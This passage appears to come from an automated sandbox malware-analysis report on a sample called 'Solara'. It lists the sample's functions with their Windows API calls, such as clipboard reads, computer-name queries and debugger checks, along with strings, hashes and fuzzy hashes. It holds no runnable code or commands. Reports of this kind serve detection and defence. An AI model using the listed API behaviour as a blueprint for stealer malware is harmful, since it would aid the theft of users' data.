GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 0040D355
ExitProcess.KERNEL32 ref: 0040D41C

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: CurrentProcess$ExecuteExitInputShellStateThread
String ID:
API String ID: 288744916-0
Opcode ID: 06c3bc9e55a8e77195fefe671e4c61179e53e110d77dd770e7b890816a0fce40
Instruction ID: 0fd37e766399452ea79ea1ecf89dbf4f21738cee6a7900bf6f7899c6cc0f7193
Opcode Fuzzy Hash: 06c3bc9e55a8e77195fefe671e4c61179e53e110d77dd770e7b890816a0fce40
Instruction Fuzzy Hash: 23C17836E483504BD3049F69C88536BFBD3EBD6325F19893DD4C4D7385DAB8884A8786

Function 004309D7 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 547
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00430B5E

Strings

84N?, xrefs: 00430E2F
?1>0, xrefs: 00430CDF
KJML, xrefs: 00430ED2

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 84N?$?1>0$KJML
API String ID: 3960555810-3517922109
Opcode ID: 74f979afedbd4e8a532ba39d7555e23a46da0b6b368afc82043d95401a895028
Instruction ID: 327fb9217243c762480ec2521c53d89e3517db4b64c61d3e8518e508b1394e73
Opcode Fuzzy Hash: 74f979afedbd4e8a532ba39d7555e23a46da0b6b368afc82043d95401a895028
Instruction Fuzzy Hash: 81F1F4716087818FE7298F39C460722FBE1AF57310F1896AEC4DA8B792C779D846CB54

Function 00430570 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 432
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0043059C
GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00430629

Strings

^ 8>, xrefs: 00430939
*1/g, xrefs: 00430932

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: ComputerName
String ID: *1/g$^ 8>
API String ID: 3545744682-1704275714
Opcode ID: efce29ad92bcd00372a4da28d57b97e33421d589f8289af82139e590459db4cd
Instruction ID: 875cefe7f0d8dd47fd6eea63c365998d9bc8be4781626f54701ff162760f58e6
Opcode Fuzzy Hash: efce29ad92bcd00372a4da28d57b97e33421d589f8289af82139e590459db4cd
Instruction Fuzzy Hash: B1D1F2705047828FE7218F29C460763FBA1AF67314F18969ED4D68B393C339E846CBA4

Function 0043C420 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00449B30,00000000,00000001,00449B20,00000000), ref: 0043C500

Strings

r{, xrefs: 0043C45D
e}, xrefs: 0043C448
dw, xrefs: 0043C44F

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: CreateInstance
String ID: dw$e}$r{
API String ID: 542301482-3703138658
Opcode ID: 71f09e7f722b90aa92155097f3e821371f5e693580c49e44e9ca9d25b534b0d0
Instruction ID: 134d8b67cf6fba851e764faf473082ad9ea46f13c3d2b40a5f02dec076a238a6
Opcode Fuzzy Hash: 71f09e7f722b90aa92155097f3e821371f5e693580c49e44e9ca9d25b534b0d0
Instruction Fuzzy Hash: C121B0B4150B009FE3308F25D949B63BBF4FB46B44F000A1CE1C24BA90D7B9B509CBA6

Function 004283C0 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 486
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*w, xrefs: 004286BE
xy, xrefs: 0042883E

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID:
String ID: *w$xy
API String ID: 0-1364878931
Opcode ID: 9637883622142507c45fb4fe395a61b8a29eb32d7f7995b41af1c66fad66904f
Instruction ID: a5bb7b2153112ba927e9dd1cf55a408020d899a35eea8af5c3c596f031079af1
Opcode Fuzzy Hash: 9637883622142507c45fb4fe395a61b8a29eb32d7f7995b41af1c66fad66904f
Instruction Fuzzy Hash: 6EF1EDB56093508FD300DF55E88165BBBE0EF82754F50892DE8D59B351E7B88909CB8B

Function 00442CC0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00445ECD,005C003F,00000006,?,?,00000018,?,?,?), ref: 00442CEE

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00431F3A Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00432036

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4e0f852b761671daafde8fecd4be61ace22f832154fb953cc5aedcc39f980b3c
Instruction ID: 7e90f89d5d63fe85bb28128323fe5546dd050c12e6dbb155ec952df3c54a2173
Opcode Fuzzy Hash: 4e0f852b761671daafde8fecd4be61ace22f832154fb953cc5aedcc39f980b3c
Instruction Fuzzy Hash: 4B319134204B418FDB168F39C9907227BE2AF9B304F18D59AD4D64B76AC67DA806CB25

Function 00442BE0 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,0040FB47,00000000,00000000), ref: 00442C70

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9c70126789a0e81895494a41944c7c98d330b819c5631919ecdd6be787f77dc7
Instruction ID: f61f7928a91c5bc2b30631262ee43b0e249b7519c161854300bd0dc3b797f659
Opcode Fuzzy Hash: 9c70126789a0e81895494a41944c7c98d330b819c5631919ecdd6be787f77dc7
Instruction Fuzzy Hash: 5D117A73B04200ABE3111E24FC52B8F7798EB96366F050839F48483393D26DD8178766

Function 0043FC00 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043FC86

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5192fc5040beb1fd904ed67ad98f239ee3a91b63eb10178b7da733c57bcd17cc
Instruction ID: 211aead1c6f4c1a4add12b08c5dc655b0fa0cf25a90231986e6a0d288bf32465
Opcode Fuzzy Hash: 5192fc5040beb1fd904ed67ad98f239ee3a91b63eb10178b7da733c57bcd17cc
Instruction Fuzzy Hash: AC01F2327852109BD7015E1CD896BDBBBE8DBDA326F051838E4C487392C228D81AD796

Function 0043FBA0 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043FBEA

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0d8d22724137fb9171bc0a9ac214c8e2644c51d3818145ec9add48bd8f9ac906
Instruction ID: a26e58627158a810960647125980d2bc04f80f1c0e575f0ecd98f7289f5fddd5
Opcode Fuzzy Hash: 0d8d22724137fb9171bc0a9ac214c8e2644c51d3818145ec9add48bd8f9ac906
Instruction Fuzzy Hash: E4F055717483008BC7189F64ED65A2BBB92DFC6714F188A3DE8C18B390C6340C26C39B

Function 0043542D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00435477

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 367651b2fc0100a49949a6bb354866145326ed03dd9ee967f1febb1fcccc1224
Instruction ID: a33adb102aacbc7f2573a03a58e69e7ca7c1e98f00d45a0e594e045740759090
Opcode Fuzzy Hash: 367651b2fc0100a49949a6bb354866145326ed03dd9ee967f1febb1fcccc1224
Instruction Fuzzy Hash: 71F07FB4608702CFE311DF25D16974BBBF1BB84308F25891DE4A55B390D7BAA9498FC2

Function 00432D89 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00432DCD

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 984190f83ec69dd234fa63963745cb92e64544f6d6d948af611b0e7f4d2bead0
Instruction ID: 12a9d58737575f9ac38a69e5d2a6bcd6d309e4efa42d35d611065e18e8a04e54
Opcode Fuzzy Hash: 984190f83ec69dd234fa63963745cb92e64544f6d6d948af611b0e7f4d2bead0
Instruction Fuzzy Hash: B0F022B45083419FE315DF19C1A871ABBF4BB89344F50891CF4948B391C7B99A59CF82

Function 0044317A Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0044317A

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 678f4db94619e1c1dd7ea38649d2fe8f8dc404061e84bbb59792b04ab113a243
Instruction ID: b8defc69bd823d4044ced74595fe230618df8aff12cc3d2489d32f3e0cf58ab8
Opcode Fuzzy Hash: 678f4db94619e1c1dd7ea38649d2fe8f8dc404061e84bbb59792b04ab113a243
Instruction Fuzzy Hash: 88D0A73B504150ABD7009B19FDA65A57390D702216B040439F083D2263D6299968CB5B

Function 00411161 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411173

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 059d275a806f9d62fff9768a1beefd4dac1c7a2b1f228c0798f03bca34e6de7b
Instruction ID: 865ce25ffa8f754c27bf895717889af42b622a4e25707abf040f66898e2eda9c
Opcode Fuzzy Hash: 059d275a806f9d62fff9768a1beefd4dac1c7a2b1f228c0798f03bca34e6de7b
Instruction Fuzzy Hash: 57D092383C8305F6F2700B58AC17F0431106303F22F300325F360BC1E08AE031508A1E

Function 00411140 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00411151

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5a3d1a269e2983305301fe5ced36788ecee0a0609dde5c991efc6f78fa4d167c
Instruction ID: a503d282d0a39757e827032928b53d3e56d75d1186f539017d1813aa49ff0952
Opcode Fuzzy Hash: 5a3d1a269e2983305301fe5ced36788ecee0a0609dde5c991efc6f78fa4d167c
Instruction Fuzzy Hash: 1EC08C34454208BBE210272DAE0AF033A2C9303761F400331B9A0440D1AA602420C5BF

Non-executed Functions

Function 00436290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 134clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004362A4
GetWindowLongW.USER32 ref: 004362C9
GetClipboardData.USER32 ref: 004362D9
GlobalLock.KERNEL32 ref: 004362F2
GlobalUnlock.KERNEL32 ref: 00436433
CloseClipboard.USER32 ref: 0043643C

Strings

9, xrefs: 00436345
[, xrefs: 00436359

Memory Dump Source

Source File: 00000001.00000002.1828328186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Solara.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: 9$[
API String ID: 2832541153-3651825367
Opcode ID: 72ae155242bbea7cf0065f4d130a9ffe3b1a06b032e4cc37a3cb74d2e624b145
Instruction ID: 23988804b27922a47d596ddb492acdd4ef3492fb0f623715efa0a33efecc4b80
Opcode Fuzzy Hash: 72ae155242bbea7cf0065f4d130a9ffe3b1a06b032e4cc37a3cb74d2e624b145
Instruction Fuzzy Hash: 1741F57290C3914ED310EF7C858821FBED05B96220F198B3DE8E5972C6D6758909C39B

Function 00C9A13A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00C9A458,00000002,00000000,?,?,?,00C9A458,?,00000000), ref: 00C9A1D3
GetLocaleInfoW.KERNEL32(?,20001004,00C9A458,00000002,00000000,?,?,?,00C9A458,?,00000000), ref: 00C9A1FC
GetACP.KERNEL32(?,?,00C9A458,?,00000000), ref: 00C9A211

Strings

OCP, xrefs: 00C9A18E
ACP, xrefs: 00C9A158

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c13cc2fc2c6318ff48920d291ed4d57432b087c0797f97119463ddf64212ed9a
Instruction ID: 30f9b2e15982630d3c85da08360b3796da069a917ea4b741abb49dc8b2a9328c
Opcode Fuzzy Hash: c13cc2fc2c6318ff48920d291ed4d57432b087c0797f97119463ddf64212ed9a
Instruction Fuzzy Hash: 5D21D032700100EADF348B59C90DBEB73A6EB54B64F268064E91AC7114E732DF41C3D2

Function 00C9A30F Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C9A41B
IsValidCodePage.KERNEL32(00000000), ref: 00C9A464
IsValidLocale.KERNEL32(?,00000001), ref: 00C9A473
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C9A4BB
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C9A4DA

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 4df5158c950ece6ed3241921873dbfcab83ce127f9909c3147d55656a9abba29
Instruction ID: 221abd17209a55c0bcba106ff2e720dc7201fe834e42032873d24599abda109c
Opcode Fuzzy Hash: 4df5158c950ece6ed3241921873dbfcab83ce127f9909c3147d55656a9abba29
Instruction Fuzzy Hash: C8519472A00215AFEF10DFA5DC49BBE77B8FF09704F044469E911E7150E7B0DA409BA2

Function 00C9998D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

GetACP.KERNEL32(?,?,?,?,?,?,00C87E68,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C99A4E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C87E68,?,?,?,00000055,?,-00000050,?,?), ref: 00C99A79
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C99BDC

Strings

utf8, xrefs: 00C99B4B

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 576d46be85a14279a47d88b2268d2d4e3820bead54b6eabf436fa272f73ce471
Instruction ID: 6d087a07019995ce5778b7f126422df34d1d0cf06729d86bd032dc5c5cc0ae3b
Opcode Fuzzy Hash: 576d46be85a14279a47d88b2268d2d4e3820bead54b6eabf436fa272f73ce471
Instruction Fuzzy Hash: 2C710631A00202ABDF34AB7DDC4ABAA73A8EF09704F14452DF516D7181EB74EE40E761

Function 00C22606 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00D0FAB8,00CBAB30,00000000,00000000), ref: 00C2276C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00C22777
CloseHandle.KERNEL32(00000000), ref: 00C2277E

Strings

IOanz UZA891nNAIUsy U(Ahy8*! , xrefs: 00C226DE

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: CloseCreateHandleObjectSingleThreadWait
String ID: IOanz UZA891nNAIUsy U(Ahy8*!
API String ID: 51348343-4274611474
Opcode ID: 1ce7fe98f5ae9e8dfbdf164153f28905ddea4132783d1762584aec221c8aac80
Instruction ID: 9a69fe8d937ddd19bd348c3c0f9c929742b58a2329497abb0a82790a445422d0
Opcode Fuzzy Hash: 1ce7fe98f5ae9e8dfbdf164153f28905ddea4132783d1762584aec221c8aac80
Instruction Fuzzy Hash: A5417D325046266BD308EB70EC52BFFB769EF48720F504125F912976E0DA388A02C694

Function 00C8C87D Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C8C90A

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: f4b51cc27617dd1a9908e6e09fb06f3a888ed0c03173de6cc8fe73929cf5c08f
Instruction ID: 10d28ef51d871c0cfbf160a49529b15cbc8c37aee04c475475cad027a4b671b1
Opcode Fuzzy Hash: f4b51cc27617dd1a9908e6e09fb06f3a888ed0c03173de6cc8fe73929cf5c08f
Instruction Fuzzy Hash: CDB18C32D042459FDB15EF68C8C2BFEBBA5EF55318F1481A6E854AB341D2349E01DBB8

Function 00C95854 Relevance: 6.1, APIs: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00C958EF
FindNextFileW.KERNEL32(00000000,?), ref: 00C9596A
FindClose.KERNEL32(00000000), ref: 00C9598C
FindClose.KERNEL32(00000000), ref: 00C959AF

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 39bf6c042c88a3567e4a91bf179d04a68456a117f412837ac67d02f0b61f157d
Instruction ID: 686199981b3245e2f78a08c24303c345fba505520a15b27a128d3ef642df35ca
Opcode Fuzzy Hash: 39bf6c042c88a3567e4a91bf179d04a68456a117f412837ac67d02f0b61f157d
Instruction Fuzzy Hash: CD41E471900A29AFEF22EF64CC8DABEB7B9EB85324F044195E415D7180E6309F818B60

Function 00C4FD68 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C4FD74
IsDebuggerPresent.KERNEL32 ref: 00C4FE40
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C4FE59
UnhandledExceptionFilter.KERNEL32(?), ref: 00C4FE63

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 7a3c2812131c6db9edf0a2825a262fb477e23a18d828ac8b1122f489d974396a
Instruction ID: 8eaf1bf8f254120ec18c4adccbf8836a2232de01020390aca7f1a0ec2b321987
Opcode Fuzzy Hash: 7a3c2812131c6db9edf0a2825a262fb477e23a18d828ac8b1122f489d974396a
Instruction Fuzzy Hash: 6D31F475D05228DBDF21EFA4D849BCDBBB8BF08304F1041AAE40DAB250EB709A859F45

Function 00C22093 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00C23EFF: __EH_prolog3_catch.LIBCMT ref: 00C23F06

Part of subcall function 00C23E3B: __EH_prolog3_catch.LIBCMT ref: 00C23E42

_Deallocate.LIBCONCRT ref: 00C2226E
_Deallocate.LIBCONCRT ref: 00C222BB

Strings

Current val: %d, xrefs: 00C22247

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_Solara.jbxd

Similarity

API ID: DeallocateH_prolog3_catch
String ID: Current val: %d
API String ID: 20358830-1825967858
Opcode ID: 1a9f64600a9c3a494f50eb6a2345b2ef0b5d6e8f7e01413a535266df4dbeee31
Instruction ID: 1e12514a6543a1ba0dcdfa22f9345f94f3d605322e100a187e8953575040fc35
Opcode Fuzzy Hash: 1a9f64600a9c3a494f50eb6a2345b2ef0b5d6e8f7e01413a535266df4dbeee31
Instruction Fuzzy Hash: 9A619C7251C3A59FC320DF29E48066BFBE0AFD8724F150A2DF9E493642D635DA04CB56

Function 00C2C540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 00C2C554
FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 00C2C57B

Strings

!x-sys-default-locale, xrefs: 00C2C54F

Memory Dump Source

Source File: 00000001.00000002.1828463139.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000001.00000002.1828447607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828508644.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828528698.0000000000CBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1828562373.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

